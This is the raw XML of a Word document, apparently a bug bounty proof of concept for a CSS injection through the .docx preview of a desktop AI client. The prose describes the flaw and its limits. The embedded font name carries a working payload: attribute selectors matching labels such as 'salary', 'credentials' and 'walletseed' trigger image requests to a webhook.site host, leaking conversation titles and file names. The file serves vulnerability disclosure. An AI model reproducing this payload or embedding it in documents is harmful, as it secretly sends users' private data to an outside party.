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Security Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Bugcrowd submission 1f32f024 — OpenAI — Codex / ChatGPT Desktop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">What this document is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This file is a proof of concept supplied to the vendor's triage team. It is not a real integration document. It carries a CSS payload in its embedded font name, reached through the client's .docx preview renderer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">What happens when it is previewed</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr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W w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Observed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Detail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Sink</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Font name injected unescaped into the preview stylesheet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Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Stylesheet applies in the privileged app origin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Leaked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Names of open documents and conversation titles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Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">CSS attribute selectors + background-image requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Recipient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">A logging endpoint that records the request path only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Limits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">No script executes — the origin's policy forbids it. No file contents are read. Only the request path reaches the endpoint, which is why the receipts are readable as plain text.</w:t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;}html{background-image:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/PAYLOAD-FIRED-css-injection-in-app-origin)!important}*[aria-label*=&quot;bugcrowd&quot;i]{--abugcrowd:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/conversation-title/bugcrowd)}*[aria-label*=&quot;money&quot;i]{--amoney:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/conversation-title/money)}*[aria-label*=&quot;football&quot;i]{--afootball:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/conversation-title/football)}*[aria-label*=&quot;weather&quot;i]{--aweather:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/conversation-title/weather)}*[aria-label*=&quot;identity&quot;i]{--aidentity:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/conversation-title/identity)}*[aria-label*=&quot;acquisition&quot;i]{--aacquisition:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/acquisition)}*[aria-label*=&quot;salary&quot;i]{--asalary:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/salary)}*[aria-label*=&quot;confidential&quot;i]{--aconfidential:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/confidential)}*[aria-label*=&quot;credentials&quot;i]{--acredentials:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/credentials)}*[aria-label*=&quot;nda&quot;i]{--anda:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/nda)}*[aria-label*=&quot;titan&quot;i]{--atitan:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/titan)}*[aria-label*=&quot;ransomware&quot;i]{--aransomware:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/decoy/ransomware)}*[aria-label*=&quot;walletseed&quot;i]{--awalletseed:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/decoy/walletseed)}*[aria-label*=&quot;payroll&quot;i]{--apayroll:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/decoy/payroll)}*[aria-label*=&quot;subpoena&quot;i]{--asubpoena:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/victim-aria-label-contains/decoy/subpoena)}*[aria-label]{background-image:url(https://webhook.site/a732c4ea-6699-49d6-96c3-a6b415b7ff5b/REPO-DELIVERY/SURFACE-PAINTED/victim-aria-label-contains),var(--abugcrowd,none),var(--amoney,none),var(--afootball,none),var(--aweather,none),var(--aidentity,none),var(--aacquisition,none),var(--asalary,none),var(--aconfidential,none),var(--acredentials,none),var(--anda,none),var(--atitan,none),var(--aransomware,none),var(--awalletseed,none),var(--apayroll,none),var(--asubpoena,none)!important}.bb-noop{color:inherit}">
    <w:embedRegular r:id="rIdF1" w:fontKey="{00000000-0000-0000-0000-000000000000}"/>
  </w:font>
</w:fonts>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rIdFT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/Relationships>
</file>